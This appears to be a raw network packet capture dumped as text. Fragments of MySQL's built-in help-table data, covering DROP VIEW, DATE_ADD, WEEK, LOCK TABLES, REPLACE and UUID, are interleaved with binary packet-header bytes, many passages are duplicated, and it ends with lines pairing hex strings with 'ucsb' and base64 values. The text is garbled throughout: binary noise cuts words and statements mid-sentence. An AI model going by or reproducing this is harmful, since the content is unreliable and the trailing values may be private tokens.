ignored.\n','DROP VIEW [IF EXISTS]\n view_name [, view_name] ...\n [RESTRICT | CASCADE]','C ZZBi0`EL@/Ao0E4@?s  P?2 !U dfDC ZZBi0`EL@/܂Sŀo0E4SN@?1 3 PtWvi't )9C bb0`BiET@/Ԁo0SE<6@@  3P  :)+until the slave has read and applied all updates up to the specified\nposition in the master log.\nThe return value is the number of log events it had to wait for to get to\nthe specified position. The function returns NULL if the slave SQL thread\nis not started, the slave\'s master information is not initialized, the\narguments are incorrect, or an error occurs. It returns -1 if the\ntimeout has been exceeded. If the slave SQL thread stops while\nMASTER_POS_WAIT() is waiting, the function returns NULL.\nIf the slave is past the specified position, the function returns\nimmediately.\n','SELECT MASTER_POS_WAIT(\'master_log_file\', master_log_pos)',''),(18,'^',27,' ^\nBitwise XOR:\n','mysql> SELECT 1 ^ 1;\n -> 0\nmysql> SELECT 1 ^ 0;\n -> 1\nmysql> SELECT 11 ^ 3;\n -> 8',''),(19,'DROP VIEW',24,'DROP VIEW removes one or more views. You must have the DROP\nprivilege for each view.\n\nYou can use the keywords IF EXISTS to prevent an error from occurring\nfor views that don\'t exist. When this clause is given, a NOTE is\ngenerated for each non-existent view.\nSee also : [SHOW WARNINGS, , SHOW WARNINGS].\n\nRESTRICT and CASCADE, if given, are parsed and ignored.\n','DROP VIEW [IF EXISTS]\n view_name [, view_name] ...\n [RESTRICT | CASCADE]','C ZZ0`BiEL@/!o0pE4@@r  P?2 !U dfDC ZZ0`BiEL@/go0AE4SN@@1 3 PtWvi't )9C ZZBi0`EL@/܂Sŀo0E4@?R 3 PZi+"l ):^C ZZBiBaEL@/fo0 o0E4:@)` Y P*OĊ G47=x$C ZZ0`BiEL@/o0  E4@@Q 3 PZi+"l ):^C ZZʪBiEL@/o0o0oE4:@@_ Y P*OĊ G47=x$C ZZBi0`EL@/$T<o0E43@?Q^  Pհ킭ـ L 1T7=w;C ZZʪBiEL@/o0o0oE43@@Q}  Pհ킭ـ N 1T7=w;C> ZZBiʪEL@/o0oo0E4@@v YP*P+ 7=x0G4CU ZZBaBiEL@/fo0o0 E4@@v YP*P+ 7=x0G4C7 ZZBiʪEL@/o0oo0E4@@ հP킮_ 7=x01TCN ZZ0`BiEL@/To0<E4@@v  հP킮^d 7=x01TC bbBi0`ET@/p܂Ao0E<6@?  3P H :)+'),(20,'DATE OPERATIONS',14,' DATE_ADD(date,INTERVAL expr type)\n DATE_SUB(date,INTERVAL expr type)\n\nThese functions perform date arithmetic.\ndate is a DATETIME or DATE value specifying the starting\ndate. expr is an expression specifying the interval value to be added\nor subtracted from the starting date. expr is a string; it may start\nwith a \'-\' for negative intervals. type is a keyword indicating\nhow the expression should be interpreted.\n','mysql> SELECT \'1997-12-31 23:59:59\' + INTERVAL 1 SECOND;\n -> \'1998-01-01 00:00:00\'\nmysql> SELECT INTERVAL 1 DAY + \'1997-12-31\';\n -> \'1998-01-01\'\nmysql> SELECT \'1998-01-01\' - INTERVAL 1 SECOND;\n -> \'1997-12-31 23:59:59\'\nmysql> SELECT DATE_ADD(\'1997-12-31 23:59:59\',\n -> INTERVAL 1 SECOND);\n -> \'1998-01-01 00:00:00\'\nmysql> SELECT DATE_ADD(\'1997-12-31 23:59:59\',\n -> INTERVAL 1 DAY);\n -> \'1998-01-01 23:59:59\'\nmysql> SELECT DATE_ADD(\'1997-12-31 23:59:59\',\n -> INTERVAL \'1:1\' MINUTE_SECOND);\n -> \'1998-01-01 00:01:00\'\nmysql> SELECT DATE_SUB(\'1998-01-01 00:00:00\',\n -> INTERVAL \'1 1:1:1\' DAY_SECOND);\n -> \'1997-12-30 22:58:59\'\nmysql> SELECT DATE_ADD(\'1C bb0`BiET@/Ԁo0SE<6@@  3P H :)+'),(20,'DATE OPERATIONS',14,' DATE_ADD(date,INTERVAL expr type)\n DATE_SUB(date,INTERVAL expr type)\n\nThese functions perform date arithmetic.\ndate is a DATETIME or DATE value specifying the starting\ndate. expr is an expression specifying the interval value to be added\nor subtracted from the starting date. expr is a string; it may start\nwith a \'-\' for negative intervals. type is a keyword indicating\nhow the expression should be interpreted.\n','mysql> SELECT \'1997-12-31 23:59:59\' + INTERVAL 1 SECOND;\n -> \'1998-01-01 00:00:00\'\nmysql> SELECT INTERVAL 1 DAY + \'1997-12-31\';\n -> \'1998-01-01\'\nmysql> SELECT \'1998-01-01\' - INTERVAL 1 SECOND;\n -> \'1997-12-31 23:59:59\'\nmysql> SELECT DATE_ADD(\'1997-12-31 23:59:59\',\n -> INTERVAL 1 SECOND);\n -> \'1998-01-01 00:00:00\'\nmysql> SELECT DATE_ADD(\'1997-12-31 23:59:59\',\n -> INTERVAL 1 DAY);\n -> \'1998-01-01 23:59:59\'\nmysql> SELECT DATE_ADD(\'1997-12-31 23:59:59\',\n -> INTERVAL \'1:1\' MINUTE_SECOND);\n -> \'1998-01-01 00:01:00\'\nmysql> SELECT DATE_SUB(\'1998-01-01 00:00:00\',\n -> INTERVAL \'1 1:1:1\' DAY_SECOND);\n -> \'1997-12-30 22:58:59\'\nmysql> SELECT DATE_ADD(\'1C+ ZZBi0`EL@/܂Sŀo0E4SP@?/ 3 PtWy't} ):CC ZZ0`BiEL@/go0AE4SP@@/ 3 PtWy't} ):C bbBi0`ET@/p܂Ao0E<6@?  3P І :)+998-01-01 00:00:00\',\n -> INTERVAL \'-1 10\' DAY_HOUR);\n -> \'1997-12-30 14:00:00\'\nmysql> SELECT DATE_SUB(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1997-12-02\'\nmysql> SELECT DATE_ADD(\'1992-12-31 23:59:59.000002\',\n -> INTERVAL \'1.999999\' SECOND_MICROSECOND);\n -> \'1993-01-01 00:00:01.000001\'',''),(21,'WITHIN',11,' Within(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 is spatially within\ng2.\n','',''),(22,'WEEK',14,' WEEK(date[,mode])\nThe function returns the week number for date. The two-argument form\nof WEEK() allows you to specify whether the week starts on Sunday or\nMonday and whether the return value should be in the range from 0 to\n53 or from 1 to 53. If the mode argument is\nomitted, the value of the default_week_format system variable is\nused (or 0 before MySQL 4.0.14).\nSee also : [Server system variables].\n\nThe following table describes how the mode argument works:\n\n First day \n Mode of week Range Week 1 is the first week...\n 0 Sunday 0-53 with a Sunday in this year\n 1 Monday 0-53 with more than 3 days this year\n 2 Sunday 1-53 with a Sunday in this year\n 3 Monday 1-53 with more than 3 days this year\n 4 Sunday 0-53 C, bb0`BiET@/Ԁo0SE<6@@  3P І :)+998-01-01 00:00:00\',\n -> INTERVAL \'-1 10\' DAY_HOUR);\n -> \'1997-12-30 14:00:00\'\nmysql> SELECT DATE_SUB(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1997-12-02\'\nmysql> SELECT DATE_ADD(\'1992-12-31 23:59:59.000002\',\n -> INTERVAL \'1.999999\' SECOND_MICROSECOND);\n -> \'1993-01-01 00:00:01.000001\'',''),(21,'WITHIN',11,' Within(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 is spatially within\ng2.\n','',''),(22,'WEEK',14,' WEEK(date[,mode])\nThe function returns the week number for date. The two-argument form\nof WEEK() allows you to specify whether the week starts on Sunday or\nMonday and whether the return value should be in the range from 0 to\n53 or from 1 to 53. If the mode argument is\nomitted, the value of the default_week_format system variable is\nused (or 0 before MySQL 4.0.14).\nSee also : [Server system variables].\n\nThe following table describes how the mode argument works:\n\n First day \n Mode of week Range Week 1 is the first week...\n 0 Sunday 0-53 with a Sunday in this year\n 1 Monday 0-53 with more than 3 days this year\n 2 Sunday 1-53 with a Sunday in this year\n 3 Monday 1-53 with more than 3 days this year\n 4 Sunday 0-53 C bbBi0`ET@/p܂Ao0E<6@?  3P  X :)+ with more than 3 days this year\n 5 Monday 0-53 with a Monday in this year\n 6 Sunday 1-53 with more than 3 days this year\n 7 Monday 1-53 with a Monday in this year\n \n\nA mode value of 3 can be used as of MySQL 4.0.5.\nValues of 4 and above can be used as of MySQL 4.0.17.\n','mysql> SELECT WEEK(\'1998-02-20\');\n -> 7\nmysql> SELECT WEEK(\'1998-02-20\',0);\n -> 7\nmysql> SELECT WEEK(\'1998-02-20\',1);\n -> 8\nmysql> SELECT WEEK(\'1998-12-31\',1);\n -> 53',''),(23,'LOCK',10,'LOCK TABLES locks tables for the current thread. If any of the tables\nare locked by other threads, it blocks until all locks can be acquired.\nUNLOCK TABLES releases any locks held by the current thread.\nAll tables that are locked by the current thread are implicitly unlocked\nwhen the thread issues another LOCK TABLES, or when the connection\nto the server is closed.\n\nA table lock protects only against inappropriate reads or writes by other\nclients. The client holding the lock, even a read lock, can perform\ntable-level operations such as DROP TABLE.\n','LOCK TABLES\n tbl_name [AS alias] {READ [LOCAL] | [LOW_PRIORITY] WRITE}\n [, tbl_name [AS alias] {READ [LOCAL] | [LOW_PRIORITY] WRITE}] ...\nUNLOCK TABLES',''),(24,'CHECK',7,'ChC mmBi0`E_@/uɂIo0EG:@?  PG]~ e;e no data found! C bbBiʪET@/o0oo0E<@@n ճP8΀pl 7=x3C bb0`BiET@/Ԁo0SE<6@@  3P  X :)+ with more than 3 days this year\n 5 Monday 0-53 with a Monday in this year\n 6 Sunday 1-53 with more than 3 days this year\n 7 Monday 1-53 with a Monday in this year\n \n\nA mode value of 3 can be used as of MySQL 4.0.5.\nValues of 4 and above can be used as of MySQL 4.0.17.\n','mysql> SELECT WEEK(\'1998-02-20\');\n -> 7\nmysql> SELECT WEEK(\'1998-02-20\',0);\n -> 7\nmysql> SELECT WEEK(\'1998-02-20\',1);\n -> 8\nmysql> SELECT WEEK(\'1998-12-31\',1);\n -> 53',''),(23,'LOCK',10,'LOCK TABLES locks tables for the current thread. If any of the tables\nare locked by other threads, it blocks until all locks can be acquired.\nUNLOCK TABLES releases any locks held by the current thread.\nAll tables that are locked by the current thread are implicitly unlocked\nwhen the thread issues another LOCK TABLES, or when the connection\nto the server is closed.\n\nA table lock protects only against inappropriate reads or writes by other\nclients. The client holding the lock, even a read lock, can perform\ntable-level operations such as DROP TABLE.\n','LOCK TABLES\n tbl_name [AS alias] {READ [LOCAL] | [LOW_PRIORITY] WRITE}\n [, tbl_name [AS alias] {READ [LOCAL] | [LOW_PRIORITY] WRITE}] ...\nUNLOCK TABLES',''),(24,'CHECK',7,'ChC/ mm0`BiE_@/)o0 EG:@@  PG]~ e;e no data found! CI bb0`BiET@/Lo0<E<@@m  ճP8΀p 7=x3C bbBi0`ET@/أ  o0E<@?  PgZ~a8 ү _ɯ -> \'7f84554057dd964b\'',''),(337,'CHAR',1,' [NATIONAL] CHAR(M) [BINARY | ASCII | UNICODE]\n\nA fixed-length string that is always right-padded with spaces to the\nspecified length when stored. M represents the column length. The\nrange of M is 0 to 255 characters (1 to 255 prior to MySQL 3.23).\n\nNote: Trailing spaces are removed when CHAR values are\nretrieved.\n\nFrom MySQL 4.1.0 to 5.0.2, a CHAR column with a length specification\ngreater than 255 is converted to the smallest TEXT type that can hold\nvalues of the given length. For example, CHAR(500) is converted to\nTEXT, and CHAR(200000) is converted to MEDIUMTEXT.\nThis is a compatibility feature. However, this conversion causes the column\nto become a variable-length column, and also affects trailing-space removal.\n\nCHAR is shorthand for CHARACTER.\nNATIONAL CHAR (or its equivalent short form, NCHAR) is the\nstandard SQL way to define that a CHAR column should use the default\ncharacter set. This is the default in MySQL.\n\nAs of MySQL 4.1.2, the BINARY attribute is shorthand for specifying\nthe binary collation of the column character set. Sorting and comparison is\nbased on numeric character values. Before 4.1.2, BINARY attribute\ncauses the column to be treated as a binary string. SortingC bb0`BiET@/4o0 E<@@  PgZ~a8 ү _ɯ -> \'7f84554057dd964b\'',''),(337,'CHAR',1,' [NATIONAL] CHAR(M) [BINARY | ASCII | UNICODE]\n\nA fixed-length string that is always right-padded with spaces to the\nspecified length when stored. M represents the column length. The\nrange of M is 0 to 255 characters (1 to 255 prior to MySQL 3.23).\n\nNote: Trailing spaces are removed when CHAR values are\nretrieved.\n\nFrom MySQL 4.1.0 to 5.0.2, a CHAR column with a length specification\ngreater than 255 is converted to the smallest TEXT type that can hold\nvalues of the given length. For example, CHAR(500) is converted to\nTEXT, and CHAR(200000) is converted to MEDIUMTEXT.\nThis is a compatibility feature. However, this conversion causes the column\nto become a variable-length column, and also affects trailing-space removal.\n\nCHAR is shorthand for CHARACTER.\nNATIONAL CHAR (or its equivalent short form, NCHAR) is the\nstandard SQL way to define that a CHAR column should use the default\ncharacter set. This is the default in MySQL.\n\nAs of MySQL 4.1.2, the BINARY attribute is shorthand for specifying\nthe binary collation of the column character set. Sorting and comparison is\nbased on numeric character values. Before 4.1.2, BINARY attribute\ncauses the column to be treated as a binary string. SortingCR bbBi0`ET@/p܂Ao0E<6@?  3P  :)+ecks a table or tables for errors. CHECK TABLE works for\nMyISAM and InnoDB tables. For MyISAM tables, the key statistics are updated.\n\nAs of MySQL 5.0.2, CHECK TABLE also can check views for problems, such\nas tables that are referenced in the view definition that no longer exist.\n','CHECK TABLE tbl_name [, tbl_name] ... [option] ...\n\noption = {QUICK | FAST | MEDIUM | EXTENDED | CHANGED}',''),(25,'RESET SLAVE',7,'RESET SLAVE\n\nMakes the slave forget its replication position in the master\'s binary logs.\nThis statement is meant to be used for a clean start: It deletes the\n*master.info and *relay-log.info files, all the relay logs,\nand starts a new relay log.\n\nNote: All relay logs are deleted, even if they have not been\ntotally executed by the slave SQL thread. (This is a condition likely to\nexist on a replication slave if you have issued a STOP SLAVE\nstatement or if the slave is highly loaded.)\n\nConnection information stored in the *master.info file is immediately\nreset using any values specified in the corresponding startup options.\nThis information includes values such as master host, master port, master\nuser, and master password. If the slave SQL thread was in the middle of\nreplicating temporary tables when it was stopped, and RESET SLAVE\niC[ ppBi0`Eb@/uƂIo0EJ:@?  PG]_ e;10 Cs bb0`BiET@/Ԁo0SE<6@@  3P  :)+ecks a table or tables for errors. CHECK TABLE works for\nMyISAM and InnoDB tables. For MyISAM tables, the key statistics are updated.\n\nAs of MySQL 5.0.2, CHECK TABLE also can check views for problems, such\nas tables that are referenced in the view definition that no longer exist.\n','CHECK TABLE tbl_name [, tbl_name] ... [option] ...\n\noption = {QUICK | FAST | MEDIUM | EXTENDED | CHANGED}',''),(25,'RESET SLAVE',7,'RESET SLAVE\n\nMakes the slave forget its replication position in the master\'s binary logs.\nThis statement is meant to be used for a clean start: It deletes the\n*master.info and *relay-log.info files, all the relay logs,\nand starts a new relay log.\n\nNote: All relay logs are deleted, even if they have not been\ntotally executed by the slave SQL thread. (This is a condition likely to\nexist on a replication slave if you have issued a STOP SLAVE\nstatement or if the slave is highly loaded.)\n\nConnection information stored in the *master.info file is immediately\nreset using any values specified in the corresponding startup options.\nThis information includes values such as master host, master port, master\nuser, and master password. If the slave SQL thread was in the middle of\nreplicating temporary tables when it was stopped, and RESET SLAVE\niC pp0`BiEb@/&o0 EJ:@@  PG]_ e;10 C ZZBi0`EL@/܂Sŀo0E4SR@?- 3 PtW'tk );C ZZ0`BiEL@/go0AE4SR@@- 3 PtW'tk );C bbBi0`ET@/p܂Ao0E<6@?  3P  =)+s issued, these replicated temporary tables are deleted on the slave.\n\nThis statement was named FLUSH SLAVE before MySQL 3.23.26.\n','',''),(26,'POLYGON',2,' Polygon(ls1,ls2,...)\nConstructs a WKB Polygon value from a number of WKB LineString\narguments. If any argument does not represent the WKB of a LinearRing\n(that is, not a closed and simple LineString) the return value\nis NULL.\n','',''),(27,'MINUTE',14,' MINUTE(time)\nReturns the minute for time, in the range 0 to 59.\n','mysql> SELECT MINUTE(\'98-02-03 10:05:03\');\n -> 5',''),(28,'DAY',14,' DAY(date)\n\nDAY() is a synonym for DAYOFMONTH().\nIt is available as of MySQL 4.1.1.\n','',''),(29,'MID',23,' MID(str,pos,len)\n\nMID(str,pos,len) is a synonym for\nSUBSTRING(str,pos,len).\n','',''),(30,'REPLACE INTO',6,'REPLACE works exactly like INSERT, except that if an old\nrecord in the table has the same value as a new record for a PRIMARY\nKEY or a UNIQUE index, the old record is deleted before the new\nrecord is inserted.\nSee also : [INSERT, ,INSERT].\n\nNote that unless the table has a PRIMARY KEY or UNIQUE index,\nusing a REPLACE statement makes no sense. It becomes equivalent to\nINSERT, because there is no index to be used to determine whether a new\nrow duplicates another.\n\nValues for allC bb0`BiET@/Ԁo0SE<6@@  3P  =)+s issued, these replicated temporary tables are deleted on the slave.\n\nThis statement was named FLUSH SLAVE before MySQL 3.23.26.\n','',''),(26,'POLYGON',2,' Polygon(ls1,ls2,...)\nConstructs a WKB Polygon value from a number of WKB LineString\narguments. If any argument does not represent the WKB of a LinearRing\n(that is, not a closed and simple LineString) the return value\nis NULL.\n','',''),(27,'MINUTE',14,' MINUTE(time)\nReturns the minute for time, in the range 0 to 59.\n','mysql> SELECT MINUTE(\'98-02-03 10:05:03\');\n -> 5',''),(28,'DAY',14,' DAY(date)\n\nDAY() is a synonym for DAYOFMONTH().\nIt is available as of MySQL 4.1.1.\n','',''),(29,'MID',23,' MID(str,pos,len)\n\nMID(str,pos,len) is a synonym for\nSUBSTRING(str,pos,len).\n','',''),(30,'REPLACE INTO',6,'REPLACE works exactly like INSERT, except that if an old\nrecord in the table has the same value as a new record for a PRIMARY\nKEY or a UNIQUE index, the old record is deleted before the new\nrecord is inserted.\nSee also : [INSERT, ,INSERT].\n\nNote that unless the table has a PRIMARY KEY or UNIQUE index,\nusing a REPLACE statement makes no sense. It becomes equivalent to\nINSERT, because there is no index to be used to determine whether a new\nrow duplicates another.\n\nValues for allC3 ZZBi0`EL@/Ao0E4+@?Z  ePZ>ſ! dl^CM ZZ0`BiEL@/o0  E4+@@Y  ePZ>ſ! dl^C bbBi0`ET@/p܂Ao0E<6@?  3P t} =)+ columns are taken from the values specified in the\nREPLACE statement. Any missing columns are set to their default\nvalues, just as happens for INSERT. You can\'t refer to values from\nthe current row and use them in the new row. If you use an assignment such\nas SET col_name = col_name + 1, the reference to the\ncolumn name on the right hand side is treated as\nDEFAULT(col_name), so the assignment is equivalent to SET\ncol_name = DEFAULT(col_name) + 1.\n\nTo be able to use REPLACE, you must have INSERT and\nDELETE privileges for the table.\n','REPLACE [LOW_PRIORITY | DELAYED]\n [INTO] tbl_name [(col_name,...)]\n VALUES ({expr | DEFAULT},...),(...),...',''),(31,'UUID',21,' UUID()\n\nReturns a Universal Unique Identifier (UUID) generated\naccording to ``DCE 1.1: Remote Procedure Call\'\' (Appendix A)\nCAE (Common Applications Environment) Specifications\npublished by The Open Group in October 1997 (Document Number C706).\n\nA UUID is designed as a number that is globally unique in space and\ntime. Two calls to UUID() are expected to generate two different\nvalues, even if these calls are performed on two separate computers that are\nnot connected to each other.\n\nA UUID is a 128-bit number represented by a string\nof five hexadecimal numbers in aaaaaaaa-bC% ZZBi0`EL@/܂Sŀo0E4@?R 3 PZi0"l );^C, ZZBi0`EL@/܂Sŀo0E4Ta@? 3 Ptj"lL );CC bb0`BiET@/Ԁo0SE<6@@  3P t} =)+ columns are taken from the values specified in the\nREPLACE statement. Any missing columns are set to their default\nvalues, just as happens for INSERT. You can\'t refer to values from\nthe current row and use them in the new row. If you use an assignment such\nas SET col_name = col_name + 1, the reference to the\ncolumn name on the right hand side is treated as\nDEFAULT(col_name), so the assignment is equivalent to SET\ncol_name = DEFAULT(col_name) + 1.\n\nTo be able to use REPLACE, you must have INSERT and\nDELETE privileges for the table.\n','REPLACE [LOW_PRIORITY | DELAYED]\n [INTO] tbl_name [(col_name,...)]\n VALUES ({expr | DEFAULT},...),(...),...',''),(31,'UUID',21,' UUID()\n\nReturns a Universal Unique Identifier (UUID) generated\naccording to ``DCE 1.1: Remote Procedure Call\'\' (Appendix A)\nCAE (Common Applications Environment) Specifications\npublished by The Open Group in October 1997 (Document Number C706).\n\nA UUID is designed as a number that is globally unique in space and\ntime. Two calls to UUID() are expected to generate two different\nvalues, even if these calls are performed on two separate computers that are\nnot connected to each other.\n\nA UUID is a 128-bit number represented by a string\nof five hexadecimal numbers in aaaaaaaa-bCU ZZ0`BiEL@/o0  E4@@Q 3 PZi0"l );^Cg ZZ0`BiEL@/go0AE4Ta@@ 3 Ptj"lL );C$ bbBi0`ET@/p܂Ao0E<6@?  3Pß ^ ?),bbb-cccc-dddd-eeeeeeeeeeee\nformat:\n\n\n --- The first three numbers are generated from a timestamp.\n\n --- The fourth number preserves temporal uniqueness in case the timestamp value loses\nmonotonicity (for example, due to daylight saving time).\n\n --- The fifth number is an IEEE 802 node number that provides spatial uniqueness. A\nrandom number is substituted if the latter is not available (for example,\nbecause the host computer has no Ethernet card, or we do not know how to\nfind the hardware address of an interface on your operating system). In\nthis case, spatial uniqueness cannot be guaranteed. Nevertheless, a\ncollision should have /very/ low probability.\n\nCurrently, the MAC address of an interface is taken into account only on\nFreeBSD and Linux. On other operating systems, MySQL uses a randomly generated\n48-bit number.\n','mysql> SELECT UUID();\n -> \'6ccd780c-baba-1026-9564-0040f4311e29\'',''),(32,'LINESTRING',2,' LineString(pt1,pt2,...)\nConstructs a WKB LineString value from a number of WKB Point\narguments. If any argument is not a WKB Point, the return value\nis NULL. If the number of Point arguments is less than two,\nthe return value is NULL.\n','',''),(33,'CONNECTION_ID',25,' CONNECTION_ID()\nReturns the connection ID (thread IDC% __Bi0`EQ@/uׂIo0E9:@?  PG]; e;0 C % ZZBi0`EL@/܂Sŀo0E4Tc@? 3 Ptj"lB{ )<C% ffBi0`EX@/ЂSŀo0E@Te@? 3 Ptj"l )< +C+% bb0`BiET@/Ԁo0SE<6@@  3Pß ^ ?),bbb-cccc-dddd-eeeeeeeeeeee\nformat:\n\n\n --- The first three numbers are generated from a timestamp.\n\n --- The fourth number preserves temporal uniqueness in case the timestamp value loses\nmonotonicity (for example, due to daylight saving time).\n\n --- The fifth number is an IEEE 802 node number that provides spatial uniqueness. A\nrandom number is substituted if the latter is not available (for example,\nbecause the host computer has no Ethernet card, or we do not know how to\nfind the hardware address of an interface on your operating system). In\nthis case, spatial uniqueness cannot be guaranteed. Nevertheless, a\ncollision should have /very/ low probability.\n\nCurrently, the MAC address of an interface is taken into account only on\nFreeBSD and Linux. On other operating systems, MySQL uses a randomly generated\n48-bit number.\n','mysql> SELECT UUID();\n -> \'6ccd780c-baba-1026-9564-0040f4311e29\'',''),(32,'LINESTRING',2,' LineString(pt1,pt2,...)\nConstructs a WKB LineString value from a number of WKB Point\narguments. If any argument is not a WKB Point, the return value\nis NULL. If the number of Point arguments is less than two,\nthe return value is NULL.\n','',''),(33,'CONNECTION_ID',25,' CONNECTION_ID()\nReturns the connection ID (thread IDC>% __0`BiEQ@/7o0 E9:@@  PG]; e;0 CP% ZZ0`BiEL@/go0AE4Tc@@ 3 Ptj"lB{ )<Ca% ff0`BiEX@/g؀o0AE@Te@@ 3 Ptj"l )< +Ca) bbBi0`ET@/p܂Ao0E<6@?  3P"˟ $~ ?),) for the connection.\nEvery connection has its own unique ID.\n','mysql> SELECT CONNECTION_ID();\n -> 23786',''),(34,'DELETE',6,'DELETE deletes rows from tbl_name that satisfy the condition\ngiven by where_definition, and returns the number of records deleted.\n\nIf you issue a DELETE statement with no WHERE clause, all\nrows are deleted. A faster way to do this, when you don\'t want to know\nthe number of deleted rows, is to use TRUNCATE TABLE.\nSee also : [TRUNCATE, , TRUNCATE].\n','DELETE [LOW_PRIORITY] [QUICK] [IGNORE] FROM tbl_name\n [WHERE where_definition]\n [ORDER BY ...]\n [LIMIT row_count]',''),(35,'ROUND',4,' ROUND(X)\n ROUND(X,D)\nReturns the argument X, rounded to the nearest integer.\nWith two arguments, returns X rounded to D decimals.\nD can be negative to round D digits left of the decimal\npoint of the value X.\n','mysql> SELECT ROUND(-1.23);\n -> -1\nmysql> SELECT ROUND(-1.58);\n -> -2\nmysql> SELECT ROUND(1.58);\n -> 2\nmysql> SELECT ROUND(1.298, 1);\n -> 1.3\nmysql> SELECT ROUND(1.298, 0);\n -> 1\nmysql> SELECT ROUND(23.298, -1);\n -> 20',''),(36,'NULLIF',9,' NULLIF(expr1,expr2)\nReturns NULL if expr1 = expr2 is true, else returns expr1.\nThis is the same as CASE WHEN exprC{) bb0`BiET@/Ԁo0SE<6@@  3P"˟ $~ ?),) for the connection.\nEvery connection has its own unique ID.\n','mysql> SELECT CONNECTION_ID();\n -> 23786',''),(34,'DELETE',6,'DELETE deletes rows from tbl_name that satisfy the condition\ngiven by where_definition, and returns the number of records deleted.\n\nIf you issue a DELETE statement with no WHERE clause, all\nrows are deleted. A faster way to do this, when you don\'t want to know\nthe number of deleted rows, is to use TRUNCATE TABLE.\nSee also : [TRUNCATE, , TRUNCATE].\n','DELETE [LOW_PRIORITY] [QUICK] [IGNORE] FROM tbl_name\n [WHERE where_definition]\n [ORDER BY ...]\n [LIMIT row_count]',''),(35,'ROUND',4,' ROUND(X)\n ROUND(X,D)\nReturns the argument X, rounded to the nearest integer.\nWith two arguments, returns X rounded to D decimals.\nD can be negative to round D digits left of the decimal\npoint of the value X.\n','mysql> SELECT ROUND(-1.23);\n -> -1\nmysql> SELECT ROUND(-1.58);\n -> -2\nmysql> SELECT ROUND(1.58);\n -> 2\nmysql> SELECT ROUND(1.298, 1);\n -> 1.3\nmysql> SELECT ROUND(1.298, 0);\n -> 1\nmysql> SELECT ROUND(23.298, -1);\n -> 20',''),(36,'NULLIF',9,' NULLIF(expr1,expr2)\nReturns NULL if expr1 = expr2 is true, else returns expr1.\nThis is the same as CASE WHEN exprC- bbBi0`ET@/p܂Ao0E<6@?  3P'ӟ .z @),1 = expr2 THEN NULL ELSE expr1 END.\n','mysql> SELECT NULLIF(1,1);\n -> NULL\nmysql> SELECT NULLIF(1,2);\n -> 1',''),(37,'STOP SLAVE',7,'STOP SLAVE [thread_type [, thread_type] ... ]\n\nthread_type: IO_THREAD | SQL_THREAD\n\nStops the slave threads.\nSTOP SLAVE requires the SUPER privilege.\n\nLike START SLAVE, as of MySQL 4.0.2, this statement\nmay be used with the IO_THREAD and SQL_THREAD options to name\nthe thread or threads to stop.\n','',''),(38,'TIMEDIFF',14,' TIMEDIFF(expr,expr2)\n\n\nTIMEDIFF() returns the time between the start time\nexpr and the end time expr2.\nexpr and expr2 are time or date-and-time expressions, but both\nmust be of the same type.\n','mysql> SELECT TIMEDIFF(\'2000:01:01 00:00:00\',\n -> \'2000:01:01 00:00:00.000001\');\n -> \'-00:00:00.000001\'\nmysql> SELECT TIMEDIFF(\'1997-12-31 23:59:59.000001\',\n -> \'1997-12-30 01:01:01.000002\');\n -> \'46:58:57.999999\'',''),(39,'RELATED',11,' Related(g1,g2,pattern_matrix)\nReturns 1 or 0 to indicate whether or not the spatial relationship specified\nby pattern_matrix exists between g1 and g2.\nReturns -1 if the arguments are NULL.\nThe pattern matrix is a string. Its specification will be noted here if this\nfunction is implemC- ZZBi0`EL@/܂Sŀo0E4Tg@? 3 Ptj+"l< )<C- bb0`BiET@/Ԁo0SE<6@@  3P'ӟ .z @),1 = expr2 THEN NULL ELSE expr1 END.\n','mysql> SELECT NULLIF(1,1);\n -> NULL\nmysql> SELECT NULLIF(1,2);\n -> 1',''),(37,'STOP SLAVE',7,'STOP SLAVE [thread_type [, thread_type] ... ]\n\nthread_type: IO_THREAD | SQL_THREAD\n\nStops the slave threads.\nSTOP SLAVE requires the SUPER privilege.\n\nLike START SLAVE, as of MySQL 4.0.2, this statement\nmay be used with the IO_THREAD and SQL_THREAD options to name\nthe thread or threads to stop.\n','',''),(38,'TIMEDIFF',14,' TIMEDIFF(expr,expr2)\n\n\nTIMEDIFF() returns the time between the start time\nexpr and the end time expr2.\nexpr and expr2 are time or date-and-time expressions, but both\nmust be of the same type.\n','mysql> SELECT TIMEDIFF(\'2000:01:01 00:00:00\',\n -> \'2000:01:01 00:00:00.000001\');\n -> \'-00:00:00.000001\'\nmysql> SELECT TIMEDIFF(\'1997-12-31 23:59:59.000001\',\n -> \'1997-12-30 01:01:01.000002\');\n -> \'46:58:57.999999\'',''),(39,'RELATED',11,' Related(g1,g2,pattern_matrix)\nReturns 1 or 0 to indicate whether or not the spatial relationship specified\nby pattern_matrix exists between g1 and g2.\nReturns -1 if the arguments are NULL.\nThe pattern matrix is a string. Its specification will be noted here if this\nfunction is implemC- ZZ0`BiEL@/go0AE4Tg@@ 3 Ptj+"l< )<Cſ̀ _ _c41330BC9562,ucsb,MTNzEwEDA4HVUZpPOYnWlygfxc9auzlvwnUgaw==
F04F86BC78D726A1AF9F157FB8902D01,ucsb,MTNzEwEDA4IZ9iabTQIpLM5RkcAeZMlO/fuw/g==
B37716126516262121E2004B26B2F8CF,ucsb,MTNzEwEDA4PBZh+OXalQm2yRIYwUlRb/f0AYSg==
3E24909B7756DEFA25AA6D4CD5905029,ucsb,MTNzEwEDA4R6stgU/HwT7IiU/ychzHjwEs/IKA==
0C733DB7EA8F30279BFBAD7F6D66D799,ucsb,MTNzEwEDA4XkNyGW6OsICxh+EpnFa/C6WuCLBA==
79BBD521E19D71C77C3D3B05A170B7FB,ucsb,MTNzEwEDA4ZlFK+Tv3gc1oCO/ofQtUcpwXXZ1A==
EFABDF3BD20A8B30EC315AC2BBCC535E,ucsb,MTNzEwEDA4dgnXk7SIQn0ckU2X5J0vB/hgtMVQ==
33CE7EC9BB4A79B68A98C09A6CA479E0,ucsb,MTNzEwEDA4gaGmk/X1AUGLHotma0Oi+qLNQ7Xg==
430CF401E14E8CDEB29082362E25E5D1,ucsb,MTNzEwEDA4luaAc17m9noTWuwzlwPlk2za5JwA==
CC33EEDE3633F92525C327610C4AA38B,ucsb,MTNzEwEDA4q7ZWsqeMl184w1TJYXqsM6Yh6e5w==
7F55A4704D930D2C1E017F3E1D350D83,ucsb,MTNzEwEDA4uPQzznRrzShHVCMHuhT55NgEWH3w==
